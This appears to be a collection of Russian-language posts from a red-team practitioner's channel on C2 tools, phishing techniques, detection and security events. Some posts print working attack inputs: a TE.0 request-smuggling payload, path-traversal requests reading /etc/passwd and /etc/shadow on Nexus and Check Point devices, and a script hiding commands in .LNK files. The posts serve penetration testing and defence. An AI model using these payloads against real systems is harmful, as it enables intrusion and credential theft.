Mythic 3.3 Beta

Пару недель назад был анонсирован релиз новой верии Mythic 3.3 Beta, которая включают в себя большое количество изменений относительно новой функциональности и фичей, призванных сделать работу Red Team оператора с С2 фреймворком еще более удобной😎

🔴 Eventing
Автоматизация действий при наступлении определенных событий, например, запуск Situational Awareness скриптов когда прилетает новый callback или автоматические увеличение sleep time для всех агентов в конце рабочего дня и уменьшение с утра и прочая приятная автоматизация.
🔴 Command Augmentation
В Сallback Configuration меню добавили возможность создания пресетов кастомных команд, которые можно исполнять на соответствующих агентами прямо из интерфейса С2 фреймворка
🔴 Auto Triage Tracking
Теперь все файлы автоматически маркируются тегами (загруженные, просмотренные) для удобства триажа собранного лута
🔴 Custom Authentication and Invites
Поддержка SSO (SAML и ADFS) и одноразовые invite ссылки для самостоятельной регистрации учеток для ваших тиммейтов
🔴 Dead Callback Estimation
Долго не отвечающие агенты помечаются в UI как Dead Callbacks на основе времени последнего checkin и параметра sleep_info
🔴 Consuming Container Tracking
Отдельный список контейнеров с возможностью загрузки/удаления файлов конфигурации прямо из интерфейса Mythic
🔴 Многое другое, полный список фич и фиксов можно посмотреть в Changelog

Приятно видеть, что Mythic интенсивно развивается и поддерживается Cody Thomas aka its-a-feature, в отличии от большинства open source C2 фреймворков. Эта работа требует огромного количества времени и ресурсов, поэтому не поленитесь поставить звездочку проекту на github, особенно если используете Mythic на своих проектах🙏

#red_teaming #Mythic_C2

Читать полностью…

Progressive Web Apps (PWAs) Phishing

Сегодня предлагаю поговорить об интересном методе доставки полезной нагрузки в рамках фишинговых компаний от mrd0x - Progressive Web Apps (PWAs) Phishing

Технология PWA приложений поддерживается всеми браузерами с 2018 года, но широкого распространения пока не получила. По сути, концепция PWA - это некое подобие "виртуальной машины" для запуска приложений в браузере с интеграцией с ОС по аналогии с нативными приложениями. На уровне архитектутры PWA состоит из Manifest File, в котором описаны метаданные в JSON (в том числе название, собственная иконка), Service Worker - скрипт, который запускается в браузере (в том числе поддерживаются push notifications, и background sync) и HTML File + CSS, JavaScript, которые связывают все это вместе.

Автором предлагается следующий сценарий:
🔴 Жертва заманивается на страницу под контролем атакующего.
🔴 Далее в окне pop-up уведомления жертве предлагается установить приложение. 
🔴 После установки приложения открывается фишинговая страница, имитирующая новое окно браузера с фейковым url адресом под контролем атакующего.
🔴 Profit😜

Таким образом, в теории это выглядит как эффективный метод доставки, требующий от пользователя минимум интерактивного взаимодействия (переход по ссылке и нажатие на кнопку Install, что реализуемо при наличии убедительного претекста, например, установка нового сертификата для VPN).
А также "легитимный" url в "новом окне браузера", например, с формой логина портала корпоративного SSO😎 добавляют убедительности, так как большинство Sесurity Awarness тренингов в первую очередь рекомендуют проверить адрес веб-страницы при определении фишинга.

Читать полностью…

TE.0 HTTP Request Smuggling

Новая техника эксплуатации HTTP Request Smuggling представлена в блоге Bugcrowd

Суть TE.0 такая же как у CL.0 только в данном случае фронт принимает, а бэкэнд игнорирует заголовок Transfer-Encoding. Кто бы мог подумать, что в мире найдутся сервера обрабатывающие запрос, который начинается с number + newline😎

OPTIONS / HTTP/1.1
Host: {HOST}
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Transfer-Encoding: chunked
Connection: keep-alive

50
GET <http://our-collaborator-server/> HTTP/1.1
x: X
0
EMPTY_LINE_HERE
EMPTY_LINE_HERE

Такие нашлись у GCP load balancer'ов, эксплуатация TE.0 позволила обойти Google IAP (Identity-Aware Proxy) и получить доступ к ресурсам за этой проксей с байпасом механизмов аутентификации и авторизации, за репорт баги Google выплатили исследователям $8.5k

Особенности эксплуатации TE.0:
✅ Значение chunk length должно быть в hex number в соответствии с HTTP/1.1 RFC
✅ 2 EMPTY_LINE_HERE в конце последнего чанка запроса
✅ Использование различных методов при отправке пейлоада (в кейсе с GCP успешно отработал OPTIONS)

Читать полностью…

Хотите прикоснуться к закрытому комьюнити Кибердома и познакомиться с нами ближе?

Приходите на Киберланч, который пройдет 25 июля на летней террасе на крыше Кибердома.

⚓️ Киберланч – ежемесячное открытое мероприятие клуба резидентов Кибердома. В этот день вы можете прийти познакомиться с нашим пространством и клубом, узнать о программах и возможностях Кибердома для наших резидентов.

⚗️ В этот раз в ламповой обстановке Кибердома в кругу единомышленников и крутых экспертов поговорим про Purple Teaming и обсудим следующие темы:

🔝 Основные отличия и преимущества Purple Teaming
🔝 Особенности проведения тестирования на проникновение
🔝 Разница в подходах к реализации Purple Teaming для внешних и внутренних команд.

Помогут разобраться в этих вопросах эксперты:

🔝 Вадим Шелест – лауреат премии «Киберпросвет» в номинации «За популяризацию Purple Team», руководитель группы анализа защищенности Wildberries.

🔝 Алексей Горелкин – резидент Кибердома, эксперт в сфере информационной безопасности и генеральный директор инновационного стартапа Phishman.

🔳 По традиции гости Киберланча смогут посетить экскурсию по уникальным пространствам кибербез-хаба, включая киберполигон, завести новые полезные знакомства и обменяться впечатлениями с другими участниками.

❗️ Зарегистрироваться на ивент можно по ссылке.

🔀 Ждем 25 июля в 16.00 в Кибердоме по адресу: ул. 2-я Звенигородская, д.12, строение 18.

#анонсы
18+

🏠 Подписаться на Кибердом & Бизнес

Читать полностью…

BlueToolkit

Тестирование беспроводных сетей в рамках комплексных pentest и red teaming проектов по дефолту включены в состав методологии практически у всех offensive команд.

Но к сожалению, часто эти работы ограничиваются только Wi-Fi сетями, как наиболее вероятной потенциальной точкой входа, реже проводятся атаки MouseJacking и совсем редко эксплуатируются Bluetooth Classic и BLE уязвимости.

Поэтому сегодня хочу рассказать про интересный инструмент, позволяющий автоматизировать эксплуатацию подобных узявимостей.

BlueToolkit - это фреймворк, который содержит 43 эксплойта для ВТ/BLE уязвимостей с подробным описанием каждой баги, условий эксплуатации и необходимого оборудования. Устанавливается на Ubuntu/Debian или VM и позволяет стать Bluetooth ниндзей🥷

Я без проблем поставил на свой старенький Nexus 5X с Kali NetHunter, который обычно использую на таких проектах😎Во время тестов был очень удивлен количеством Bluetooth устройств вокруг в обычном многоквартирном доме 😂 телевизоры, принтеры, датчики и всякий разный IoT и даже дверной звонок соседей🙊

Обязательно расскажу про опыт использования в "боевых условиях", как подвернется соответсвующий проект.

Читать полностью…

WASM Smuggling for Initial Access

Про использовании HTML Smuggling для доставки пейлоадов для получения первоначального доступа я уже неоднократно писал и рассказывал, эта техника долгие годы отлично работала практически из коробки. Но на данный момент некоторые песочницы и client proxy научились эффективно детектить HTML Smuggling в автоматизированном режиме, поэтому злоумышленники адаптировали Web Assembly для усложнения идентификации использования этой техники.

Про WASM Smuggling я слышал только из TI отчетов и никогда ранее не использовал на практике, поэтому этот пост больше про теорию и сбор информации для начала исследования

Web Assembly (WASM) позволяет использовавть C, C++, Rust, Go и другие для запуска в браузере, это значительно усложняет автоматизированный анализ в сравнении с обфусцированным JavaScript, поэтому позволяет оставаться ниже радаров защитных решений.

🖊References:
WebAssembly Is Abused by eCriminals to Hide Malware
WebAssembly Smuggling: It WASM’t me
The Silk Wasm: Obfuscating HTML Smuggling with Web Assembly
WASM Smuggling for Initial Access and W.A.L.K. Tool Release

⚙️Tools:
The Silk Wasm - HTML Smuggling with Web Assembly
W.A.L.K. - Web Assembly Lure Krafter

В следующих постах из этой серии я обязательно поделюсь результатами ресерча и опытом использования этой техники.

PS: Может быть кто-то использует WASM Smuggling на проектах для получения первоначального доступа, расскажите пожалуйста в комментариях о своих результатах.

Читать полностью…

T-Guard
Сегодня хотелось рассказать об интересном проекте - как построить свой SOC с блэкджеком и аналитиками из подручных open source компонентов.
Для большой компании в качестве боевого SOC такое решение скорее всего не подойдет придется долго допиливать, но T-Guard отлично подходит для отработки сценариев в лабораторном окружении при подготовке к Purple Teaming

Архитектура T-Guard:
🔵 Wazuh Agents - агенты для сбора логов и телеметрии
🔵 Wazuh Server - SIEM
🔵 IRIS - incident response платформа для анализа и расследования инцидентов
🔵 MISP - Threat Intelegence platform
🔵 Shuffle - SOAR для автоматизации этапов расследования и реагирования
🔵 Cкрипт для установки компонентов с помощью docker compose

Компоненты можно кастомизировать, например, заменить Wazuh на Osquery + ELK, потыкать дефолтные правила и ощутить всю боль detection engineering🙈

Таким образом можно почувствовать себя в роли аналитика SOC, чтобы лучше понять как работают инструменты защитников😎

Читать полностью…

В конце прошлого месяца были опубликованы детали уязвимости CVE-2024-4956 (оценка по CVSS=7.5) классический path traversal в Sonatype Nexus Repository 3.x

Данная уязвимость, несмотря на недооценённую оценку критичности имеет большой потенциал для развития supply chain атак, благодаря широкому распространению open-source версии данного ПО в разных компаниях по всему миру.
Sonatype Nexus Repository представляет собой менеджер репозиториев для хранения артефактов. Поддерживаются следующие форматы артефактов: Java (Maven), образы Docker, Python, Ruby, NPM, Bower, RPM-пакеты, gitlfs, apt, Go, Nuget и пр.

Эксплуатация очень тривиальна и позволяет не аутентифицированному злоумышленнику получить доступ к чтению файлов на сервере ПО:
curl https://nexus_target/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Но предположим, что мы не просто хотим читать файлики, а получить доступ и протроянить артефакты для развития дальнейших атак 😎
Nexus для аутентификации использует Apache Shiro 1 хеши, которые можно прочитать из OrientDB .pcl файлов с помощью эксплуатации этой уязвимости, но была проблема была в том, что оригинальный Hashcat не умел в Shiro 1, до момента пока Dylan Evans aka fin3ss3g0d не написал для него модуль - mode 12150, а заодно и скрипт автоматизирующий этот вектор эксплуатации👍

⚙️ POC: https://github.com/fin3ss3g0d/CVE-2024-4956
🔎 Shodan: title:"Sonatype Nexus Repository"
🔎 Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-4956.yaml
🪲 Уязвимые версии ПО: Sonatype Nexus Repository OSS/Pro до версии 3.68.1
✅ Рекомендации: Патч уже доступен, необходимо обновиться до версии 3.68.1

Читать полностью…

Анализ TTPs APT группировок на основе TI отчетов, а также разработка и тестирование атомарных тест-кейсов для реализуемых сценариев всегда занимает определенное время на этапе подготовки к проведению Purple Teaming. Поэтому мы всегда стараемся сначала найти нормальную аналитику с техническими подробностями, без маркетинговой воды и "highly sophisticated" формулировок😎 Недавно мне на глаза попался очень полезный репозиторий, который хотелось бы порекомендовать в этой заметке.

Автор детально разбирает отчеты и публикует готовый план и необходимые инструменты для проведения симуляции сценария в формате Purple Teaming.
На примере последнего - Fancy Bear APT28 Adversary Simulation:

🟣 Create dll downloads files through base64, This is to download two files the first is (dfsvc.dll) the second is (Stager.dll)
🟣 Exploiting CVE-2021-40444 to inject the DLL file into Word File and create an execution for DLL by opening Word File
🟣 Word File is running and the actual payload is downloaded through DLLDownloader.dll and we have two files Stager.dll and dfsvc.dll
🟣 The Stager decrypts the actual payload and runs it which in turn is responsible for command and control
🟣 Data exfiltration over OneDrive API C2. This integrates OneDrive API functionality to facilitate communication between the compromised system and the attacker-controlled server thereby potentially hiding the traffic within legitimate OneDrive communication
🟣 Get Command and Control through payload uses the OneDrive API to upload data including command output to OneDrive, the payload calculates the CRC32 checksum of the MachineGuid and includes it in the communication with the server for identification purposes

В итоге получается готовый сценарий, который можно кастомизировать и использовать для проведения Purple Teaming.

Читать полностью…

Using LNK files in cyberattacks

Мой хороший друг в прошлом месяце написал отличный пост про использование Hidden Commands в .LNK файлах.
Техника T1204.001 в атрибуте ICON_LOCATION по UNC \\172.27.25.70\test.ico для NTLM Disclosing эффективно используется очень-очень давно, разбросать свои ярлыки и "пропатчить" иконки существующих на всех возможных шарах вообще по умолчанию в составе любой пентест методологии.

Но выполнение команд скрытых в атрибуте COMMAND_LINE_ARGUMENTS файла ярлыка не всегда рассматривается во время проведения тестирований на проникновение, хотя злоумышленники активно используют эту технику в дикой природе. Поэтому крайне важно создать и протестировать технические уровни контроля для обнаружения и предотвращения всех потенциальных векторов с использованием .LNK файлов.

Видимость атрибута COMMAND_LINE_ARGUMENT в GUI ограничена количеством символов, добавив newlines = "`n" * 200 можно полностью скрыть команду от любопытных глаз пользователя.

⚙️ PowerShell скрипт для автоматизации создания ярлыка:

$NAME_STRING="MaliciousShortcut"
$RELATIVE_PATH="C:\Windows\System32\cmd.exe"
$newlines = "`n" * 200
$WORKING_DIR="C:\Windows\System32"
$COMMAND_LINE_ARGUMENTS="$newlines /c calc.exe"
$ICON_LOCATION="C:\Windows\System32\imageres.dll, 197"
$WshShell = New-Object -comObject WScript.Shell
$ShortcutPath = "c:\$NAME_STRING.lnk"
if (Test-Path $ShortcutPath) {

Remove-Item $ShortcutPath

}
$Shortcut = $WshShell.CreateShortcut($ShortcutPath)
$Shortcut.TargetPath = $RELATIVE_PATH
$Shortcut.WorkingDirectory = $WORKING_DIR
$Shortcut.Arguments = $COMMAND_LINE_ARGUMENTS
$Shortcut.IconLocation = $ICON_LOCATION
$Shortcut.Save()

Читать полностью…

🗣 Вадим Шелест, Wildberries: Red Teaming – это своего рода экзамен, во время которого можно чему-то научиться, но в большинстве случаев будет уже слишком поздно

Вадим Шелест, руководитель группы анализа защищенности Wildberries, автор блога PurpleBear и лауреат премии «Киберпросвет», рассказал порталу Cyber Media о специфике реализации проектов purple team, отличиях от классических редтим-проектов и полезности purple team для обучения команд защитников.

Читать полностью…

Специалист по тестированию на проникновение

Уровень: Middle/Senior
З/П: 200-400 тыс рублей net
Формат: удаленка или гибрид

Вместе с масштабным развитием IT направления, Wildberries развивает информационную безопасность. Мы решаем сложные и разнообразные задачи: от повышения защищенности каждого сервиса до развития безопасности в рамках всей нашей инфраструктуры.

А наша инфраструктура - это более 100 складов и сортировочных центров, десятки тысяч серверов.
Мы хотим обеспечить повсеместную безопасность и поэтому развиваем внутреннюю команду Red Team - нам нужны специалисты по тестированию на проникновение.

Детальнее о задачах:
• Участие в проведении проектов по тестированию на проникновение внешней и внутренней инфраструктуры
• Участие в проведении проектов по тестированию на проникновение веб/мобильных приложений
• Участие в проведении Red Teaming проектов: симуляция действий атакующих в режиме сокрытия своего присутствия и активного противодействия со стороны подразделений SOC
• Участие в проведении Purple Teaming проектов: эмуляция действий атакующих по MITRE с целью тестирования методов обеспечения информационной безопасности бизнес-процессов и оценки эффективности деятельности подразделений SOC
• Формирование рекомендаций по оптимизации процессов и методов обнаружения
• Формирование рекомендаций и компенсирующих мер на основе векторов эксплуатации найденных уязвимостей

Необходимые опыт и навыки:
• Опыт в проектах по тестированию на проникновение (внешняя и внутренняя инфраструктура, в том числе СУБД, систем виртуализации и контейнеризации)
• Опыт поиска и эксплуатации уязвимостей ОС Linux, а также специфичных для них сервисов
• Знание любого языка программирования на уровне достаточном для автоматизации задач
• Понимание принципов работы современных веб/мобильных приложений
• Понимание принципов работы и построения сетей
• Понимание принципов работы современных ОС и возможностей для повышения привилегий

Будет плюсом:
• Наличие профильных сертификатов (OSCP, OSWE, OSEP и пр.)
• Выступления на профильных конференциях/митапах
• Участие в CTF и Bug Bounty программах
• Опыт администрирования Linux-систем, сетевого оборудования, систем оркестрации
• Опыт коммерческой разработки веб/мобильных приложений

Мы предлагаем:
• Гибкое начало рабочего дня и гибридный формат работы: от офиса в Москве (с бесплатными завтраками, обедами и ужинами) до полной удаленки
• Вариативность оформления: трудовой договор, ИП или ГПХ
• Корпоративные скидки у партнеров, внешние программы по обучению и внутренние митапы
• Ежегодная 40%-ая скидка на покупку ноутбука или мобильного телефона

Контакты: @iul_naidenova

Читать полностью…

На Positive Hack Days Fest 2 участвую в дискуссии - Как защитить основной канал бизнес-коммуникаций

Мы с коллегами поговорим о методах и стратегиях обеспечения безопасности электронной почты как основного средства коммуникации в современных организациях. Обсудим актуальные угрозы и вызовы и поделимся лучшими практиками и инновационными подходами к защите.

Ключевые вопросы для обсуждения:

✅ Какие основные угрозы и уязвимости существуют в сфере безопасности электронной почты и как их можно преодолеть?
✅ Какие технические и организационные меры защиты можно применить для обеспечения конфиденциальности, целостности и доступности электронной почты?
✅ Как обучить персонал организации основам безопасности электронной почты и повысить их осведомленность о потенциальных угрозах?
✅ Какие инновационные технологии и методы могут помочь в обнаружении и предотвращении атак (фишинг и спам)?
✅ Какие стратегии мониторинга и реагирования можно применить для быстрого обнаружения инцидентов безопасности и реагирования на них?
✅ Как проверить, что электронная почта действительно защищена?

⏰ 23 мая, 12:25–13:25
🧭 Киберарена, зал Галактика

До встречи на PHDays Fest 2 🎉🎉🎉

Читать полностью…

From Zero to Hero: Phishing Campaign

Сегодня хотел бы поделиться отличным гайдом от ребят из Onsec по подготовке и проведению фишинговых кампаний в рамках тестирований на проникновение.

Руководство представляет собой серию постов содержащих подробные инструкции:

🔴 Preparation
Цели, сбор информации и подготовка списка контактов, ожидаемые результаты кампании, метрики и отчет
🔴 Technical Implementation
Инфраструктура, конфигурация компонентов GoPhish и Evilginx3, настройка Cloudflare Turnstile, подготовка сценария и претекста, готовый phishlet для Google Auth, необходимая кастомизация и скрипты автоматизации для создания групп и уникальных идентификаторов (unique_id) для каждого получателя в списке контактов через API GoPhish
🔴 Results & Recommendations
Результаты кампании и рекомендации

Таким образом, получилось детальное руководство по проведению эффективных фишинговых кампаний без лишней воды и неактуальной информации, очень рекомендую👍

PS: Отдельное спасибо за рекомендацию ZOHO Mail и особый респект за сценарий с Awareness Training😎

Читать полностью…

Summoning RAGnarok With Your Nemesis

Такой провокационный заголовок получил пост SpecterOps с описанием функциональности LLM чат бота RAGnarok для удобного поиска по индексу данных, которые агрегирует Nemesis.

RAGnarok - это такой Судный день, если бы Терминатора🤖 снимали в Скандинавии чат бот, который использует RAG (retrieval-augmented generation) метод работы с LLM, когда пользователь пишет свой вопрос, а под капотом к этому вопросу добавляется дополнительная информация из каких‑то внешних источников и подается все целиком на вход как промт для языковой модели. Другими словами RAG должен найти соответствующую информацию в проиндексированных Nemesis данных и подать на вход LLM не только вопрос пользователя, но и релевантную запросу часть содержимого базы данных, чтобы LLM могла сформировать правильный и релевантный ответ.

RAGnarok использует openchat-3.5-0106, intel/neural-chat-7b-v3-3, Starling-LM-7b-alpha, reranker на основе BAAI/bge-reranker-base и embedding model на основе TaylorAI’s gte-tiny. Остальные подробности относительно архитектуры и выбора компонентов можно найти в блоге🤪
Простыми словами, это просто чатик в веб-интерфейсе, который поднимается локально и подключается к API Nemesis. Он с трудом работает без GPU, падает когда упирается в потолок по RAM при обработке тяжелых запросов и позволяет искать информацию по данным Nemesis через интерфейс чат бота🙈

Мое мнение после экспериментов с RAGnarok - это прикольно😁 Но практической пользы от его использования не много, за исключением формулировок для Executive Summary части отчета по проекту😎 Все тоже самое можно делать через поиск по интерфейсу Nemesis, хотя если добавить бота для Telegram, прикрутить OpenAI Whisper API для распознавания голосовых сообщений и какой-нибудь аналог GPT-4 Vision может получится такой личный "AI секретарь" Red Team оператора😂

Читать полностью…

Всем привет!
На прошлой неделе принимал участие в Киберланче, посвященном Purple Teaming на площадке Кибердома. Новый и очень интересный для меня формат свободной дискуссии в кругу резидентов и гостей Кибердома, в рамках которой мы обсудили Purple Teaming, как эффективный формат оценки и совершенствования уровня защищенности.

Вместо 20 мин, которые были запланированы на мое выступление, мы общались почти 1.5 часа🤪
Большое спасибо всем участникам за проявленный интерес, вопросы, мнения и комментарии🙏 Особенно приятно, что в аудитории были люди не из отрасли ИБ, которым интересна тема Purple Teaming, это очень круто👍

Также хотелось выразить слова благодарности администрации Кибердома за организацию подобных мероприятий и популяризацию отрасли ИБ, большой респект👍

PS: Отдельное спасибо Сергею Зыбневу aka @poxek за шикарный подарок🔥

Читать полностью…

В докладе на киберфестивале Positive Hack Days Fest 2 я рассказывал про использование Teleport, как open source PAM-решения для атакующей инфраструктуры, которое позволяет управлять доступами и ролями пользователей.

PAM - это Privileged Access Management система, для обеспечения доступа к виртуальным машинам, серверам, кластерам Kubernetes и пр. Существует большое количество проприетарных PAM‑решений, однако большинство из них заточено под классическую Windows-инфраструктуру и не учитывают некоторые возможности Linux.

Идея использовать Teleport для Red Teaming инфры появилась после доклада Строим свой PAM на основе Teleport на Positive Hack Days 12, где мои коллеги Антон Жаболенко и Павел Пархомец рассказывали, о том как в Wildberries используется Teleport для управления доступами на более чем 30 тыс хостов🔥

На прошлой неделе на хабре опубликовали статью по мотивам этого крутейшего доклада. В ней детально описаны критерии выбора идеального PAM, а также опыт и результаты внедрения Teleport в огромной инфраструктуре Wildberries.

Рекомендую этот материал для всех кто в поиске PAM решения для своей инфраструктуры или просто хочет побольше узнать как работает Teleport.

Оставляйте свои вопросы и комментарии на хабре или прямо под этим постом.

Читать полностью…

SharpHound Detection

В блоге ipurple team опубликовали статью о возможностях обнаружения SharpHound коллектора на С# для BloodHound

Авторы предлагают следующую схему детекта:
🔵 Обнаружение запуска SharpHound на основе использование API: NetSessionEnum (\PIPE\srvsvc) из srvcli.dll, NetWkstaUserInfo (\PIPE\wkssvc) из netapi32.dll, RegEnumKeyW (\PIPE\winreg) из advapi32.dll
🔵 Обнаружение обращений к \\*\IPC$ с использованием SAMR (RPC over SMB) c помощью GPO Audit File Share (Event ID 5140), GPO Audit Detailed File Share (Event ID 5145), GPO Audit Directory Service Access (Event ID 4662)
🔵 LDAP запросы с помощью SilkETW с поддержкой YARA
SilkETW.exe -t user -pn Microsoft-Windows-LDAP-Client -ot eventlog -l verbose -y yara -yo all

Таким образом, на основе совокупности этих признаков предлагается обнаруживать активность атакующих по сбору информации об AD инфраструктуре с использованием SharpHound. Очень интересно услышать мнение защитников об эффективности данной схемы особенно в отношении false positive, поэтому буду очень рад вашим комментариям.

Читать полностью…

В поисках новых техник для нашей внутренней кастомной версии матрицы MITRE (о том как мы ее ведем рассказывал в этой заметке) наткнулся на репозиторий SaaS attack techniques от Push Security. В нем собраны техники атак на SaaS платформы (Software as a Service) смапленные на MITRE. Практически в любой компании можно найти продукты по этой модели распространения (почта, офисные приложения, ЭДО, рекламная аналитика и пр)😎

Поэтому сегодня предлагаю рассмотреть технику SAMLjacking из этого списка для получения первоначального доступа. По сути это фишинг для получения учетных данных с использованием SaaS SSO функциональности.

Злоумышленик регистрирует аккаунт у SaaS провайдера, создает приглашения присоединиться к "новому корпоративному аккаунту" для списка целей, которое приходит им на почту с легитимного домена SaaS провайдера, например Miro, Мой Офис, Контур и пр.

SSO url для этого аккаунта настроен на сервер под контролем злодея сразу же, либо переключается уже в процессе через некоторое время использования сервиса, чтобы усыпить бдительность потенциальных жертв. Так злоумышленник получает учетные данные жертвы при аутентификации через SSO.

Таким образом, при наличии убедительного претекста, это вполне эффективная техника получения первоначального доступа, которая используется в дикой природе особенно в отношении новых сотрудников в период онбординга.

Читать полностью…

В качестве темы для пятничного поста предлагаю продолжить разговор про сканирование внешнего периметра на больших скоупах.

Я всегда в процессе поиска инструментов для оптимизации пайплайнов, автоматизирующих внешнее сканирование, поэтому недавно на глаза попался Smap - аналог консольной утилиты nrich от shodan о котором хотелось бы рассказать в этой заметке.

Smap - это "сканнер портов" который использует API shodan.io (ключ не нужен) для получения информации по tcp/top-1237 портам без необходимости их реального сканирования, что бывает очень удобно на первоначальном этапе сбора и валидации скоупа.
Например, пока идет следующая итерация tcp/10k пайплайна сканирования naabu/masscan/etc -> nmap, у вашей команды уже есть с чем работать, не дожидаясь этих результатов😎

В отличии от nrich он умеет работать с хостнеймами и подсетями в CIDR и сохраняет полученные результаты:
oX // nmap's xml format
oG // nmap's greppable format
oN // nmap's default format
oA // output in all 3 formats above at once
oP // IP:PORT pairs seperated by newlines
oS // custom smap format
oJ // json

Таким образом, использование подобных утилит не сможет полноценно заменить этап сканирования, но позволяет сэкономить время на первоначальном этапе работ.

Читать полностью…

Putting the C2 in C2loudflare

Использование сервисов Cloudflare для сокрытия атакующей инфраструктуры уже давно стало модным трендом среди злоумышленников. Бесплатный уровень подписки, отсутствие необходимости привязывать карту, простота конфигурации Cloudflare Workers в качестве редиректоров позволяют эффективно прятать С2 за customworkername.customsubdomain.workers.dev или собственными доменами.

По ссылке подробная инструкция по развертыванию и подключению простого редиктора на js до С2 на Azure. VM в Azure разворачиваются из снапшотов кастомных темплейтов - просто и быстро без terraform, ansible, контейнеров, фраппучино😁 и прочего DevOps.

Для себя в этой статье открыл tmux-resurrect, плагин который восстанавливает tmux env после перезагрузки системы.

Таким образом, подобный подход конечно лишен изящества, преимуществ автоматизации и гибкости, но при этом очень прост и позволяет менее чем за 5 минут развернуть минимально необходимый набор компоненетов атакующей инфраструктуры практически бесплатно😎

Читать полностью…

Осталось всего несколько дней для того чтобы подать заявку на участие в премии Pentest award by Awillix

Ждем ваши работы в номинациях:

🪲 Пробив WEB
⚙️ Пробив инфраструктуры
📲 Девайс
🔬«**ck the logic» — За находку самых топовых логических баг.
💡«Раз bypass, два bypass» — За самый красивый обход средств защиты информации.
🎣 «Ловись рыбка» — За самый оригинальный фишинг или попытку засоциалить сотрудников. Оценивается всё: нагрузка, текст фишинга, использование нестандартных инструментов.

Горячо приветствуется творческий подход, оригинальность по форме и содержанию, креативная подача, развернутое повествование, обезличенное описание контекста и вводных, примеры эксплуатации. Оценивать будем строго, но справедливо😎

Не упускайте шанс побороться за звание лучшего этичного хакера, получить призы и потусить с единомышленниками в камерной атмосфере на церемонии награждения. 

Делитесь своими наработками — https://award.awillix.ru/

Читать полностью…

Nmap-did-what

Бывает что на длительных проектах необходимо постоянно диффать результаты регулярных итераций сканирования, с целью своевременного обнаружения новых потенциально уязвимых хостов и открытых портов. Особенно актуальна такая задача для внутренних offensive команд в динамичных сегментах инфраструктуры, например, внутреннее облако, где по сути любой пользователь может поднять и развернуть все что угодно...чтобы просто потестить😜

Для тех кому нужна подобная аналитика с визуализацией хочу порекомендовать утилиту - nmap-did-what. Инструмент представляет собой скрипт на python, который парсит XML выхлоп nmap и складывает результаты в SQLite базу данных, которая в свою очередь используется как datasource для контейнера Grafana, развёрнутого с помощью docker compose.

✅ Clone the repository

git clone https://github.com/hackertarget/nmap-did-what.git
cd nmap-did-what

✅ Parse Nmap XML output

python nmap-to-sqlite.py nmap_output.xml

✅ Start the Grafana Container

docker-compose up -d

✅ Access Grafana
http://localhost:3000

На выходе получаем готовый дашборд с результатами сканирования, который можно использовать для дальнейшей аналитики и приоритезации новых потенциальных целей😎

Читать полностью…

Меня иногда просят посоветовать self-hosted лабы по различным доменам знаний деятельности пентестеров для наработки и совершенствования навыков на практике, поэтому ловите небольшую подборку:

☑️ Kubernetes Goat - Vulnerable by design Kubernetes cluster
☑️ GOAD - Game of Active Directory
☑️ DVWA - Damn Vulnerable Web Application
☑️ DVWS - Damn Vulnerable Web Sockets
☑️ DVHMA - Damn Vulnerable Hybrid Mobile App (Android)
☑️ DVIA - Damn Vulnerable iOS App
☑️ DVIA2 - Damn Vulnerable iOS App v2
☑️ CI/CD Goat - Vulnerable CI/CD environment
☑️ DVGA - Damn Vulnerable GraphQL Application
☑️ VAmPI - Vulnerable REST API
☑️ DVSA - Damn Vulnerable Serverless Application
☑️ DVFaaS - Damn Vulnerable Functions as a Service (AWS Lambda)
☑️ AWS Goat - Damn Vulnerable AWS Infrastructure
☑️ DVCA - Damn Vulnerable Cloud Application (AWS privesc)
☑️ Azure Goat - Damn Vulnerable Azure Infrastructure
☑️ GCP Goat - Damn Vulnerable GCP Infrastructure
☑️ DVTA - Damn Vulnerable Thick Client App
☑️ DVJA - Damn Vulnerable Java (EE) Application
☑️ DVID - Damn Vulnerable IoT Device
☑️ DVAS - Damn Vulnerable Application Scanner
☑️ DVB - Damn Vulnerable Bank
☑️ DVWPS - Damn Vulnerable WordPress Site
☑️ DVNA - Damn Vulnerable NodeJS Application
☑️ DVGM - Damn Vulnerable Grade Management
☑️ Tiredful API - REST API intentionally designed broken App
☑️ DVCSharp - Damn Vulnerable C# Application (API)
☑️ DVRF - Damn Vulnerable Router Firmware
☑️ DVLLMP - Damn Vulnerable LLM Project
☑️ DVLLMA - Damn Vulnerable LLM Agent

Безусловно некоторые из них уже устарели и содержат не самые актуальные баги, а с некоторыми придется повозиться чтобы установить и развернуть, но все же это хорошая отправная точка для погружения в интересующую тематику😎

Читать полностью…

Check Point - You deserve the best security an arbitrary file read (CVE-2024-24919)

После небольшого перерыва возвращаемся к техническому контенту😎 И сегодня предлагаю поговорить про активно эксплуатируемую в дикой природе уязвимость CVE-2024-24919 (оценка по CVSS 3.1=8.6), которая позволяет неавторизованному злоумышленнику читать произвольные файлы на устройствах Check Point с включенными IPSec VPN, Remote Access VPN и Mobile Access.

Технические подробности, опубликованные в блоге Watchtowr раскрывают детали эксплуатации, суть которой заключается в классическом path traversal с привилегиями root пользователя🙈, приводящему к чтению любых файлов на устройстве, например хешей паролей пользователей, session tokens, файлов конфигурации.

POST /clients/MyCRL HTTP/1.1
Host: target.com
Content-Length: 41

aCSHELL/../../../../../../../etc/shadow

Согласно статистики Censys на 31.05 в интернете доступно 13,802 потенциально уязвимых устройств.

⚙️ POC: https://github.com/seed1337/CVE-2024-24919-POC
⚙️ Bulk Scanner: https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner
🔎 Shodan: title:"Check Point" || "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
🔎 Fofa: app="Check_Point-SSL-Network-Extender"
🔎 Nuclei template: https://github.com/johnk3r/nuclei-templates/blob/c226ece895c8e4e6aec22aff66f21e5b8b70e08e/http/cves/2024/CVE-2024-24919.yaml
🔎 IOCs: https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/
🪲 Уязвимые версии ПО: R77.20, R77.30, R80.10, R80.20, R80.20.x, R80.20SP, R80.30, R80.30SP, R80.40, R81, R81.10, R81.10.x, R81.20
✅ Рекомендации: Патчи уже доступны

Читать полностью…

Всем привет!
